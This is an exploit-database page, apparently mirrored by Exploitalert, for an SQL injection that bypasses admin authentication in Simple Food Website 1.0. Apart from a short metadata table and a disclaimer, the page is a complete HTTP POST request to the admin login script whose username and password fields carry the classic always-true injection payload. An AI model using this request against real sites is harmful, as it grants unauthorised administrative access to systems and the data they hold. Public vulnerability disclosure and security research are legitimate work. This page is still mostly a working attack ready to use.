Simple Food Website 1.0 SQL Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown Critical Remote 2021-04-05
Our sensors found this exploit at:

Below is a copy:

Simple Food Website 1.0 SQL Injection
# Exploit Title: Simple Food Website (CMS) | Admin Bypass (SQLi)
# Exploit Author: Richard Jones
# Date: 02-04-2021
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

# Admin Login: http://TARGET/food/admin/process_login.php

POST /food/admin/process_login.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 579
Origin: http://TARGET
Connection: close
Referer: http://TARGET/food/admin/login.php
Cookie: SSESSaca5a63f4c2fc739381fab7741d68783=xVaP07jLGdxx_p3Qsv1qO_3duBIN1XqSJKxxD4hJFkA; PHPSESSID=8iq8rtprfi0t6s7ou0pj02rt4a
Upgrade-Insecure-Requests: 1

username=' or 1=1-- -&password=' or 1=1-- -&Sign+In=Sign+In

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum